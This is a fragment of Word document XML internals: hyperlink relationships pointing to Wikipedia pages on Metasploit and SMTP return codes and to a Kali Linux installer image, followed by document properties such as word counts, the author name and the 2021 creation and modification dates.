Target="https://he.wikipedia.org/wiki/Metasploit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hyperlink" Target="https://en.wikipedia.org/wiki/List_of_SMTP_server_return_codes" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cdimage.kali.org/kali-2020.4/kali-linux-2020.4-installer-amd64.iso" TargetMode="Externa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FEF5-B9F0-46CE-AEC1-710559F4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35</Pages>
  <Words>2807</Words>
  <Characters>14037</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>116</Lines>
  <Paragraphs>3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יא ונג</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>גיא ונג</cp:lastModifiedBy>
  <cp:revision>61</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2021-03-10T10:44:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-04-25T14:54:00Z</dcterms:modified>
</cp:coreProperties>
</file>